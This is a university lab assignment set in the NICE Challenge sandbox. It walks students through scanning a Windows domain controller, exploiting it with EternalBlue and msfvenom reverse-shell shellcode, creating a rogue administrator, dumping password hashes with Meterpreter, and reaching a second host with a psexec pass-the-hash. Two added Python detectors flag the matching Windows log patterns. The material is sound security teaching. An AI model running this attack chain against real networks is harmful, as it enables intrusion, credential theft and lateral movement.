Lab 9 - NICE Challenge - Professor Shafer Special

In this lab you are going to use Metasploit to target systems running Microsoft Windows.

  • Environment: Pretty Safe Electronics
  • Challenge Title: Unauthorized Activity Alert (or any challenge in the PSE environment)
  • Access via https://portal.nice-challenge.com/

In this lab, you're going to use the NICE Challenge ecosystem and its virtual machines, but Professor Shafer has gone completely off the rails and written a new assignment using the "Pretty Safe Electronics" network. Ignore the NICE Challenge self-tests and the NICE submission system; submit this assignment through Canvas.

Activities

Part 1 - Scanning

Log onto the Security-Desk system. It's Kali Linux, just an older release than what you have installed on your own computer.

Do an nmap scan of the domain controller ("AD-Server", short for Active Directory Server, on the network map) from within Metasploit. Tell nmap to include all the details and tests in its scanning. What command do you use?

Deliverables:

  • What nmap command do you use to scan the domain controller?
  • From the 'hosts' view of Metasploit, what is the hostname of the domain controller?
  • From the 'services' view of Metasploit, what version of SSH is the domain controller running? (Include the protocol part too)
  • From the 'services' view of Metasploit, what version of Windows is the domain controller running? (Include the Release and Build part)

Part 2 - Exploit

Search for exploits related to the eternalblue exploit, which is effective on many (unpatched) versions of Windows.

msf6> search eternalblue

Metasploit has a scanner for eternalblue. Let's use that first.

msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> info
msf6> options
msf6> set RHOSTS 172.16.30.55    # RHOSTS, plural, because it could scan many hosts
msf6> exploit
# Scanner will run and report results

Ah, a vulnerability was found! Let's use the eternalblue exploit, then.

Based on the instructions in "How to Exploit EternalBlue to Get a Meterpreter Session on Windows Server 2012 R2".

Download eternalblue8_exploit.py from https://gist.github.com/worawit (just use the web browser on Security-Desk)

Download the eternalblue kernel shellcode eternalblue_x64_kshellcode.asm from https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm (just use the web browser on Security-Desk)

Assemble the kernel shellcode (transform the raw assembly code into binary machine code)

$ nasm -f bin eternalblue_x64_kshellcode.asm

Generate a userland shell payload using msfvenom. Note that LHOST and LPORT point to the Security-Desk machine. It's the "local" machine from the perspective of the exploit.

$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=172.16.20.55 LPORT=4444

Combine the kernel and userland shellcode

$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin

Set up Metasploit to receive the reverse shell as soon as it is running (the payload here is a plain command shell; the upgrade to Meterpreter comes in Part 3)

msf6> use exploit/multi/handler
msf6> set PAYLOAD windows/x64/shell/reverse_tcp
msf6> set LHOST 172.16.20.55   # IP of Security-Desk, which will listen
msf6> set LPORT 4444
msf6> exploit -j    # Run exploit handler as a background job
### Leave this running and waiting

Install the Impacket library, which the exploit needs to function

# Need to install impacket on Python 2.7, but pip is not installed for that Python version. (System pip is for Python 3.x)
# First install pip, then upgrade the setup tools, then finally install impacket
$ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
$ sudo python get-pip.py
$ sudo python -m pip install --upgrade setuptools
$ sudo python -m pip install impacket==0.9.22

Run the exploit

$ python eternalblue8_exploit.py 172.16.30.55 reverse_shell.bin 500

What sessions have been created?

msf6> sessions
msf6> sessions -i <num>     # where <num> = Number of session that just opened

Deliverables:

  • Upload a screenshot showing your active shell on the Domain Controller

Part 3 - Post-Exploit

Now that you have initial access to the system, take advantage of it.

Deliverables:

  • What user are you on the domain controller? Use the whoami command.
  • Create a new account on the domain controller with username "evilhacker" and password "pwned". What command did you enter at the shell to accomplish this?
  • Elevate that "evilhacker" user to the administrator group. What command did you enter at the shell to accomplish this?
  • Obtain a list of users on the domain controller at the command line. Upload a screenshot where 'evilhacker' is visible
  • Back in the NICE webportal, launch the remote desktop interface to the domain controller. Log in as 'evilhacker' and provide a screenshot showing 'evilhacker' as your current username as proof of work.
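
From the defender's side, the two account steps above leave a recognizable pair of records in the domain controller's Security log. The following is an added example, not part of the original lab: it correlates event 4720 (account created) with 4728/4732/4756 (member added to a group) over constructed records. The SIDs, the `jsmith` and `Sales` names and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Windows Security event IDs: 4720 = user account created;
# 4728 / 4732 / 4756 = member added to a global / local / universal group.
CREATE_ID, GROUP_ADD_IDS = 4720, {4728, 4732, 4756}
BUILTIN_ADMINS = "S-1-5-32-544"    # well-known SID of the built-in Administrators group
PRIVILEGED_RIDS = {"512", "519"}   # Domain Admins, Enterprise Admins
WINDOW = timedelta(minutes=10)     # assumption: tune to your provisioning workflow

def _ts(ev):
    return datetime.fromisoformat(ev["time"])

def is_privileged_group(sid):
    """True for built-in Administrators or a domain group with a privileged RID."""
    return sid == BUILTIN_ADMINS or (
        sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in PRIVILEGED_RIDS)

def find_new_admin_accounts(events, window=WINDOW):
    """Flag accounts added to a privileged group within `window` of being created."""
    created, alerts = {}, []       # created: new account SID -> its 4720 event
    for ev in sorted(events, key=_ts):
        if ev["id"] == CREATE_ID:
            created[ev["TargetSid"]] = ev
        elif ev["id"] in GROUP_ADD_IDS and is_privileged_group(ev["TargetSid"]):
            origin = created.get(ev["MemberSid"])
            if origin and _ts(ev) - _ts(origin) <= window:
                alerts.append({"account": origin["TargetUserName"],
                               "group": ev["TargetUserName"],
                               "delay_s": int((_ts(ev) - _ts(origin)).total_seconds())})
    return alerts

# Constructed sample records (not real logs); every SID below is made up.
DOM = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_EVENTS = [
    # Routine onboarding: new user placed in an ordinary group (RID 1201).
    {"id": 4720, "time": "2024-03-01T09:00:00", "TargetUserName": "jsmith", "TargetSid": DOM + "-1603"},
    {"id": 4728, "time": "2024-03-01T09:01:00", "TargetUserName": "Sales", "TargetSid": DOM + "-1201", "MemberSid": DOM + "-1603"},
    # Long-standing account promoted: no recent 4720, so this rule stays quiet.
    {"id": 4732, "time": "2024-03-01T11:30:00", "TargetUserName": "Administrators", "TargetSid": BUILTIN_ADMINS, "MemberSid": DOM + "-1150"},
    # The pattern from this lab: account created, then made an administrator.
    {"id": 4720, "time": "2024-03-01T14:02:11", "TargetUserName": "evilhacker", "TargetSid": DOM + "-1604"},
    {"id": 4732, "time": "2024-03-01T14:02:40", "TargetUserName": "Administrators", "TargetSid": BUILTIN_ADMINS, "MemberSid": DOM + "-1604"},
]

print(find_new_admin_accounts(SAMPLE_EVENTS))
```

Matching on the new account's SID rather than its name keeps the rule working if the account is renamed between the two events.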

Switch back to the Security-Desk and Metasploit now. Background the running shell (exploit) with CTRL-Z, then enter y when prompted to "Background session?"

Now upgrade your shell to Meterpreter.

msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
msf6> options
msf6> set SESSION <num>   # Where <num> is session you JUST backgrounded
msf6> exploit   # Should see "Meterpreter session <num> opened"
msf6> sessions

Take a screenshot at this point as a deliverable.

Connect to that active Meterpreter session on the domain controller.

msf6> sessions -i <num>   # Where <num> is NEW meterpreter session

There are lots of fun things to do here!

meterpreter>  sysinfo    # Where am I running?  Should be domain controller
meterpreter>  getprivs   # See what permissions we have
meterpreter>  ps         # Process list
meterpreter>  getsystem  # Ensure we're escalated to SYSTEM access, if not already
meterpreter>  migrate <pid>  # Migrate to another process - Look for vds.exe and use its PID
meterpreter>  hashdump

These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don't need the original password; the hash alone will suffice).

Deliverables:

  • Submit a screenshot showing both your original shell session and new Meterpreter session active. (Use the sessions command in Metasploit)
  • Submit a screenshot showing the password hashes that exist on the domain controller. (Use the hashdump command in Meterpreter)
  • What is the full hash for the account with RID 500 (the original administrator)? Provide the entire line you get from hashdump.
    Tip: Rather than manually typing it out (error-prone), use the https://cl1p.net website for a basic clipboard between the NICE VM and whatever system you are completing this Canvas assignment on.

Background the meterpreter shell on the domain controller: CTRL-Z, then y

Part 4 - Pass-the-Hash

Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext. This is a "feature" of older versions of Windows.

See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on

msf6> use exploit/windows/smb/psexec
msf6> set RHOST 172.16.30.88    # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 172.16.20.55    # Security-Desk
msf6> set LPORT 4445            # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions

Deliverables:

  • Submit a screenshot showing all three sessions active. (The original shell to the domain controller, the Meterpreter shell to the domain controller, and the Meterpreter shell to the database).
  • Submit a screenshot showing the output of sysinfo on the database.
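
On the DATABASE host, the psexec step in Part 4 shows up as a network NTLM logon followed almost immediately by a service installation. The following is an added example, not part of the original lab: it pairs event 4624 (logon type 3, NTLM, RID 500 account) with event 7045 (service installed) on the same host over constructed records. The host names `FILESRV` and `WEB01`, the jump-host allowlist, the SIDs, the service names and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

# 4624 = successful logon (Security log); 7045 = service installed (System log).
LOGON_ID, SERVICE_INSTALL_ID = 4624, 7045
WINDOW = timedelta(seconds=60)       # assumption: how soon the service must follow
ADMIN_SOURCES = {"172.16.20.10"}     # hypothetical allowlist of admin jump hosts

def _ts(ev):
    return datetime.fromisoformat(ev["time"])

def is_suspect_logon(ev):
    """Network (type 3) NTLM logon by the RID 500 account from a non-admin source.
    A password-based NTLM logon looks identical, so this is a lead, not proof."""
    return (ev["id"] == LOGON_ID and ev["LogonType"] == 3
            and ev["AuthenticationPackageName"] == "NTLM"
            and ev["TargetUserSid"].endswith("-500")
            and ev["IpAddress"] not in ADMIN_SOURCES)

def find_ntlm_then_service(events, window=WINDOW):
    """Pair each suspect logon with a service install on the same host within `window`."""
    last_logon, alerts = {}, []      # host -> most recent suspect logon
    for ev in sorted(events, key=_ts):
        host = ev["Computer"]
        if is_suspect_logon(ev):
            last_logon[host] = ev
        elif ev["id"] == SERVICE_INSTALL_ID and host in last_logon:
            logon = last_logon.pop(host)
            if _ts(ev) - _ts(logon) <= window:
                alerts.append({"host": host, "source": logon["IpAddress"],
                               "service": ev["ServiceName"]})
    return alerts

# Constructed sample records (not real logs); the SID and service names are made up.
ADMIN_SID = "S-1-5-21-4444444444-5555555555-6666666666-500"
SAMPLE_EVENTS = [
    # Allowlisted jump host deploying a service: ignored.
    {"id": 4624, "time": "2024-03-01T08:00:00", "Computer": "FILESRV", "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserSid": ADMIN_SID, "IpAddress": "172.16.20.10"},
    {"id": 7045, "time": "2024-03-01T08:00:05", "Computer": "FILESRV", "ServiceName": "constructed-backup-agent"},
    # Suspect logon with no service install afterwards: no alert from this rule.
    {"id": 4624, "time": "2024-03-01T10:15:00", "Computer": "WEB01", "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserSid": ADMIN_SID, "IpAddress": "172.16.20.55"},
    # The pattern from Part 4: logon from Security-Desk, service installed 2 s later.
    {"id": 4624, "time": "2024-03-01T15:30:10", "Computer": "DATABASE", "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserSid": ADMIN_SID, "IpAddress": "172.16.20.55"},
    {"id": 7045, "time": "2024-03-01T15:30:12", "Computer": "DATABASE", "ServiceName": "constructed-svc-01"},
]

print(find_ntlm_then_service(SAMPLE_EVENTS))
```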